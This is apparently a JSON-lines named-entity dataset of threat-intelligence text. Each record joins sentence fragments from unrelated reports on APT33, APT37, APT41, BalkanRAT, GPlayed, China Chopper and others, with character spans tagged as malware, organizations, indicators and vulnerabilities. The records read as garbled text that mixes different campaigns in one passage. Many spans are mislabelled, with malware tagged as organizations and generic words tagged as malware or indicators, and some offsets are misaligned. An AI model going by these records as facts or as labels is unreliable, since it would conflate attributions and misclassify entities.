{"text": "] com was a C2 for Poison Ivy samples associated with attacks on Myanmar and other Asian countries discussed in a blog published by Arbor Networks in April 2016 . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 132, "end": 146, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 366, "end": 395, "label": "Malware"}]}
{"text": "Another tie between the activity is the C2 jackhex.md5c [ . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015 . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor .", "spans": [{"start": 43, "end": 59, "label": "Indicator"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 330, "end": 352, "label": "Malware"}]}
{"text": "] net , which was also used as a Poison Ivy C2 in the Arbor Networks blog . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": [{"start": 33, "end": 43, "label": "Malware"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 120, "end": 127, "label": "Organization"}, {"start": 165, "end": 184, "label": "Organization"}, {"start": 363, "end": 372, "label": "Organization"}, {"start": 375, "end": 382, "label": "Organization"}, {"start": 397, "end": 402, "label": "Organization"}]}
{"text": "\u201c jackhex \u201d is not a common word or phrase and , as noted above , was also seen in the beacon activity with the previously discussed 9002 sample . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) .", "spans": [{"start": 133, "end": 137, "label": "Malware"}, {"start": 147, "end": 156, "label": "Malware"}, {"start": 190, "end": 197, "label": "Malware"}, {"start": 267, "end": 277, "label": "Malware"}, {"start": 383, "end": 393, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}]}
{"text": "Finally , since publishing the 9002 blog , Unit 42 has also seen the aforementioned 9002 C2 used as a Poison Ivy C2 with a Myanmar political-themed lure . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam .", "spans": [{"start": 31, "end": 35, "label": "Malware"}, {"start": 84, "end": 88, "label": "Malware"}, {"start": 102, "end": 112, "label": "Malware"}, {"start": 245, "end": 254, "label": "Organization"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 353, "end": 361, "label": "Organization"}, {"start": 436, "end": 444, "label": "Organization"}, {"start": 498, "end": 508, "label": "Organization"}]}
{"text": "In our 9002 blog we noted some additional infrastructure used either as C2s for related Poison Ivy samples , or domain registrant overlap with those C2 domains . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang .", "spans": [{"start": 7, "end": 11, "label": "Malware"}, {"start": 88, "end": 98, "label": "Malware"}, {"start": 217, "end": 233, "label": "Organization"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 373, "end": 394, "label": "Malware"}, {"start": 450, "end": 463, "label": "Malware"}, {"start": 466, "end": 477, "label": "Malware"}, {"start": 482, "end": 489, "label": "Malware"}]}
{"text": "When we published that blog Unit 42 hadn \u2019 t seen any of the three registrants overlap domains used in malicious activity . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 .", "spans": [{"start": 436, "end": 441, "label": "Organization"}]}
{"text": "Since then , we have seen Poison Ivy samples using third-levels of querlyurl [ . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": [{"start": 26, "end": 36, "label": "Malware"}, {"start": 67, "end": 80, "label": "Indicator"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 296, "end": 301, "label": "Organization"}]}
{"text": "] com , lending further credence the remaining two domains , gooledriveservice [ . We\u2019ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . We assess APT33 works at the behest of the Iranian government .", "spans": [{"start": 61, "end": 82, "label": "Indicator"}, {"start": 117, "end": 127, "label": "Organization"}, {"start": 217, "end": 231, "label": "Vulnerability"}, {"start": 244, "end": 249, "label": "Organization"}]}
{"text": "] com and appupdatemoremagic [ . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . APT33 has targeted organizations \u2013 spanning multiple industries \u2013 headquartered in the United States , Saudi Arabia and South Korea .", "spans": [{"start": 10, "end": 32, "label": "Indicator"}, {"start": 38, "end": 47, "label": "Malware"}, {"start": 52, "end": 62, "label": "Malware"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 169, "end": 197, "label": "Organization"}]}
{"text": "] com are or were intended for malicious use . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor .", "spans": [{"start": 196, "end": 206, "label": "Organization"}, {"start": 245, "end": 265, "label": "Malware"}, {"start": 273, "end": 289, "label": "Organization"}]}
{"text": "While we do not have complete targeting , information associated with these Poison Ivy samples , several of the decoy files were in Chinese and appear to be part of a 2016 campaign targeting organizations in Taiwan with political-themed lures . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production .", "spans": [{"start": 76, "end": 86, "label": "Malware"}, {"start": 278, "end": 288, "label": "Malware"}, {"start": 473, "end": 487, "label": "Vulnerability"}, {"start": 490, "end": 495, "label": "Organization"}, {"start": 550, "end": 565, "label": "Organization"}, {"start": 600, "end": 613, "label": "Organization"}, {"start": 627, "end": 640, "label": "Organization"}]}
{"text": "Conclusion Typically masquerading as legitimate Android system apps , and sometimes embedding legitimate apps within them , the primary goal of the malicious HenBox appears to be to spy on those who install them . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen\u2026 and using BalkanRAT , they can do whatever they want on the computer . From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings .", "spans": [{"start": 48, "end": 55, "label": "Malware"}, {"start": 158, "end": 164, "label": "Malware"}, {"start": 248, "end": 256, "label": "Organization"}, {"start": 314, "end": 323, "label": "System"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 435, "end": 447, "label": "Organization"}, {"start": 455, "end": 471, "label": "Organization"}, {"start": 487, "end": 508, "label": "Organization"}]}
{"text": "Using similar traits , such as copycat iconography and app or package names , victims are likely socially engineered into installing the malicious apps , especially when available on so-called third-party ( i.e . The BalkanDoor backdoor does not implement any exfiltration channel . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector .", "spans": [{"start": 217, "end": 227, "label": "System"}, {"start": 228, "end": 236, "label": "System"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 390, "end": 406, "label": "Organization"}]}
{"text": "non-Google Play ) app stores which often have fewer security and vetting procedures for the apps they host . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals .", "spans": [{"start": 11, "end": 15, "label": "System"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 125, "end": 135, "label": "System"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 326, "end": 338, "label": "Organization"}, {"start": 343, "end": 357, "label": "Organization"}]}
{"text": "It \u2019 s possible , as with other Android malware , that some apps may also be available on forums , file-sharing sites or even sent to victims as email attachments , and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 281, "end": 289, "label": "Malware"}, {"start": 294, "end": 301, "label": "Malware"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 443, "end": 455, "label": "Organization"}, {"start": 475, "end": 496, "label": "Organization"}, {"start": 505, "end": 519, "label": "Indicator"}, {"start": 592, "end": 613, "label": "Organization"}]}
{"text": "The hosting locations seen for some HenBox samples , together with the nature of some embedded apps including : those targeted at extremist groups , those who use VPN or other privacy-enabling apps , and those who speak the Uyghur language , highlights the victim profile the threat actors were seeking to attack . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": [{"start": 36, "end": 42, "label": "Malware"}, {"start": 336, "end": 353, "label": "Malware"}, {"start": 447, "end": 452, "label": "Organization"}, {"start": 519, "end": 533, "label": "Indicator"}]}
{"text": "The targets and capabilities of HenBox , in addition to the ties to previous activity using four different Windows malware families with political-themed lures against several different South East Asian countries , indicates this activity likely represents an at least three-year-old espionage campaign . Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": [{"start": 32, "end": 38, "label": "Malware"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 341, "end": 351, "label": "System"}, {"start": 580, "end": 585, "label": "Organization"}, {"start": 749, "end": 757, "label": "Organization"}]}
{"text": "THURSDAY , OCTOBER 11 , 2018 GPlayed Trojan - .Net playing with Google Market Introduction In a world where everything is always connected , and mobile devices are involved in individuals ' day-to-day lives more and more often , malicious actors are seeing increased opportunities to attack these devices . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 444, "end": 449, "label": "Organization"}, {"start": 613, "end": 621, "label": "Organization"}]}
{"text": "Cisco Talos has identified the latest attempt to penetrate mobile devices \u2014 a new Android trojan that we have dubbed \" GPlayed . Based on the Let\u2019s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 82, "end": 89, "label": "System"}, {"start": 119, "end": 126, "label": "Malware"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 293, "end": 299, "label": "Organization"}, {"start": 304, "end": 318, "label": "Organization"}, {"start": 384, "end": 397, "label": "Organization"}, {"start": 459, "end": 465, "label": "Organization"}]}
{"text": "'' This is a trojan with many built-in capabilities . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": [{"start": 154, "end": 162, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 244, "end": 250, "label": "System"}, {"start": 254, "end": 263, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}]}
{"text": "At the same time , it 's extremely flexible , making it a very effective tool for malicious actors . Further analysis of the BITTER APT\u2019s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet .", "spans": [{"start": 125, "end": 137, "label": "Organization"}, {"start": 207, "end": 223, "label": "Organization"}, {"start": 240, "end": 251, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 330, "end": 348, "label": "Organization"}]}
{"text": "The sample we analyzed uses an icon very similar to Google Apps , with the label \" Google Play Marketplace '' to disguise itself . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries .", "spans": [{"start": 52, "end": 63, "label": "System"}, {"start": 83, "end": 106, "label": "System"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 268, "end": 281, "label": "Organization"}, {"start": 307, "end": 312, "label": "Malware"}, {"start": 313, "end": 320, "label": "Malware"}]}
{"text": "The malicious application is on the left-hand side . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored .", "spans": [{"start": 70, "end": 80, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 248, "end": 253, "label": "Organization"}, {"start": 296, "end": 305, "label": "Organization"}, {"start": 310, "end": 316, "label": "Organization"}]}
{"text": "What makes this malware extremely powerful is the capability to adapt after it 's deployed . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups .", "spans": [{"start": 160, "end": 170, "label": "Organization"}, {"start": 185, "end": 204, "label": "Organization"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 273, "end": 278, "label": "Organization"}, {"start": 322, "end": 325, "label": "Indicator"}, {"start": 366, "end": 379, "label": "Organization"}]}
{"text": "In order to achieve this adaptability , the operator has the capability to remotely load plugins , inject scripts and even compile new .NET code that can be executed . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group\u2019s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user\u2019s credentials . This coupled with the timing of operations \u2013 which coincides with Iranian working hours \u2013 and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government .", "spans": [{"start": 135, "end": 139, "label": "System"}, {"start": 252, "end": 262, "label": "Organization"}, {"start": 547, "end": 559, "label": "Malware"}, {"start": 589, "end": 594, "label": "Organization"}]}
{"text": "Our analysis indicates that this trojan is in its testing stage but given its potential , every mobile user should be aware of GPlayed . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . The publicly available backdoors and tools utilized by APT33 \u2013 including NANOCORE , NETWIRE , and ALFA Shell \u2013 are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups .", "spans": [{"start": 127, "end": 134, "label": "Malware"}, {"start": 137, "end": 147, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 304, "end": 312, "label": "Malware"}, {"start": 315, "end": 322, "label": "Malware"}, {"start": 329, "end": 339, "label": "Malware"}, {"start": 460, "end": 473, "label": "Organization"}]}
{"text": "Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People\u2019s Republic of China . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": [{"start": 199, "end": 206, "label": "Organization"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 440, "end": 448, "label": "Organization"}, {"start": 512, "end": 520, "label": "Organization"}, {"start": 597, "end": 605, "label": "Organization"}]}
{"text": "But GPlayed is an example of where this can go wrong , especially if a mobile user is not aware of how to distinguish a fake app versus a real one . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 149, "end": 179, "label": "Organization"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 369, "end": 378, "label": "Organization"}, {"start": 383, "end": 397, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}, {"start": 494, "end": 504, "label": "Organization"}, {"start": 508, "end": 516, "label": "Organization"}]}
{"text": "Trojan architecture and capabilities This malware is written in .NET using the Xamarin environment for mobile applications . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": [{"start": 64, "end": 68, "label": "System"}, {"start": 79, "end": 86, "label": "System"}, {"start": 125, "end": 138, "label": "System"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 221, "end": 238, "label": "Organization"}, {"start": 316, "end": 321, "label": "Organization"}, {"start": 334, "end": 342, "label": "Organization"}, {"start": 456, "end": 464, "label": "Organization"}, {"start": 500, "end": 508, "label": "Organization"}]}
{"text": "The main DLL is called \" Reznov.DLL . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate .", "spans": [{"start": 25, "end": 35, "label": "Indicator"}, {"start": 38, "end": 51, "label": "Malware"}, {"start": 74, "end": 83, "label": "Organization"}, {"start": 96, "end": 103, "label": "Malware"}]}
{"text": "'' This DLL contains one root class called \" eClient , '' which is the core of the trojan . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": [{"start": 92, "end": 103, "label": "Organization"}, {"start": 127, "end": 140, "label": "System"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 272, "end": 285, "label": "System"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 354, "end": 359, "label": "Organization"}]}
{"text": "The imports reveal the use of a second DLL called \" eCommon.dll . Here , we investigate a campaign targeting an Asian government organization . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government .", "spans": [{"start": 52, "end": 63, "label": "Indicator"}, {"start": 118, "end": 141, "label": "Organization"}, {"start": 161, "end": 190, "label": "Organization"}, {"start": 297, "end": 302, "label": "Organization"}]}
{"text": "'' We determined that the \" eCommon '' file contains support code and structures that are platform independent . We observed another campaign targeting an organisation located in Lebanon . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": [{"start": 193, "end": 204, "label": "Organization"}, {"start": 211, "end": 216, "label": "Organization"}]}
{"text": "The main DLL also contains eClient subclasses that implement some of the native capabilities . China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government .", "spans": [{"start": 95, "end": 108, "label": "Malware"}, {"start": 188, "end": 195, "label": "Malware"}, {"start": 246, "end": 275, "label": "Organization"}, {"start": 338, "end": 343, "label": "Organization"}]}
{"text": "The package certificate is issued under the package name , which also resembles the name of the main DLL name . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea .", "spans": [{"start": 237, "end": 250, "label": "Malware"}, {"start": 254, "end": 269, "label": "Malware"}, {"start": 272, "end": 277, "label": "Organization"}]}
{"text": "Certificate information The Android package is named \" verReznov.Coampany . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities .", "spans": [{"start": 28, "end": 35, "label": "System"}, {"start": 55, "end": 73, "label": "Indicator"}, {"start": 80, "end": 84, "label": "Malware"}, {"start": 85, "end": 97, "label": "Malware"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 382, "end": 391, "label": "Organization"}, {"start": 394, "end": 405, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 424, "end": 433, "label": "Organization"}, {"start": 436, "end": 446, "label": "Organization"}, {"start": 451, "end": 470, "label": "Organization"}]}
{"text": "'' The application uses the label \" Installer '' and its name is \" android.app.Application . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country .", "spans": [{"start": 36, "end": 45, "label": "Indicator"}, {"start": 67, "end": 90, "label": "Indicator"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 165, "end": 178, "label": "Vulnerability"}, {"start": 301, "end": 317, "label": "Vulnerability"}, {"start": 318, "end": 325, "label": "Vulnerability"}, {"start": 338, "end": 343, "label": "Organization"}, {"start": 456, "end": 482, "label": "Organization"}]}
{"text": "'' Package permissions The trojan declares numerous permissions in the manifest , from which we should highlight the BIND_DEVICE_ADMIN , which provides nearly full control of the device to the trojan . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran .", "spans": [{"start": 206, "end": 214, "label": "Organization"}, {"start": 474, "end": 491, "label": "Organization"}, {"start": 511, "end": 516, "label": "Organization"}, {"start": 583, "end": 588, "label": "Organization"}]}
{"text": "This trojan is highly evolved in its design . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea .", "spans": [{"start": 72, "end": 83, "label": "Organization"}, {"start": 252, "end": 257, "label": "Organization"}]}
{"text": "It has modular architecture implemented in the form of plugins , or it can receive new .NET source code , which will be compiled on the device in runtime . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) .", "spans": [{"start": 87, "end": 91, "label": "System"}, {"start": 277, "end": 289, "label": "Organization"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 429, "end": 436, "label": "Organization"}, {"start": 515, "end": 541, "label": "Organization"}]}
{"text": "Initialization of the compiler object The plugins can be added in runtime , or they can be added as a package resource at packaging time . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": [{"start": 182, "end": 193, "label": "Organization"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 282, "end": 287, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}, {"start": 317, "end": 332, "label": "Organization"}, {"start": 339, "end": 349, "label": "Organization"}, {"start": 413, "end": 436, "label": "Organization"}]}
{"text": "This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea .", "spans": [{"start": 147, "end": 160, "label": "Malware"}, {"start": 289, "end": 302, "label": "Vulnerability"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 399, "end": 404, "label": "Organization"}, {"start": 417, "end": 426, "label": "Malware"}, {"start": 427, "end": 434, "label": "Malware"}, {"start": 491, "end": 499, "label": "Organization"}, {"start": 504, "end": 526, "label": "Organization"}]}
{"text": "Trojan native capabilities This is a full-fledged trojan with capabilities ranging from those of a banking trojan to a full spying trojan . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad .", "spans": [{"start": 153, "end": 164, "label": "Organization"}, {"start": 280, "end": 294, "label": "Vulnerability"}, {"start": 306, "end": 319, "label": "Vulnerability"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 442, "end": 449, "label": "Organization"}]}
{"text": "This means that the malware can do anything from harvest the user 's banking credentials , to monitoring the device 's location . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites .", "spans": [{"start": 179, "end": 190, "label": "Organization"}, {"start": 252, "end": 257, "label": "Organization"}, {"start": 305, "end": 310, "label": "Malware"}, {"start": 311, "end": 318, "label": "Malware"}]}
{"text": "There are several indicators ( see section \" trojan activity '' below ) that it is in its last stages of development , but it has the potential to be a serious threat . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 169, "end": 180, "label": "Organization"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 312, "end": 320, "label": "Vulnerability"}, {"start": 321, "end": 332, "label": "System"}, {"start": 349, "end": 362, "label": "Vulnerability"}, {"start": 379, "end": 386, "label": "Malware"}, {"start": 387, "end": 394, "label": "Malware"}]}
{"text": "Trojan details Upon boot , the trojan will start by populating a shared preferences file with the configuration it has on its internal structures . During its recent campaigns , Cloud Atlas used a new polymorphic\u201d infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 178, "end": 189, "label": "Organization"}, {"start": 414, "end": 441, "label": "Organization"}, {"start": 488, "end": 493, "label": "Organization"}, {"start": 506, "end": 514, "label": "Vulnerability"}, {"start": 515, "end": 526, "label": "System"}, {"start": 543, "end": 556, "label": "Vulnerability"}, {"start": 573, "end": 580, "label": "Malware"}, {"start": 581, "end": 588, "label": "Malware"}]}
{"text": "Afterward , it will start several timers to execute different tasks . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware .", "spans": [{"start": 74, "end": 89, "label": "Organization"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 174, "end": 182, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 260, "end": 268, "label": "Organization"}, {"start": 273, "end": 297, "label": "Organization"}, {"start": 307, "end": 323, "label": "Malware"}, {"start": 328, "end": 349, "label": "Malware"}]}
{"text": "The first timer will be fired on the configured interval ( 20 seconds in this case ) , pinging the command and control ( C2 ) server . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations .", "spans": [{"start": 235, "end": 250, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 342, "end": 347, "label": "Malware"}, {"start": 348, "end": 355, "label": "Malware"}]}
{"text": "The response can either be a simple \" OK , '' or can be a request to perform some action on the device . In one article published in the Kharkiv Observer \u2013 an independent Ukranian online publication \u2013 an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea .", "spans": [{"start": 250, "end": 277, "label": "Organization"}, {"start": 324, "end": 339, "label": "Organization"}, {"start": 378, "end": 383, "label": "Organization"}]}
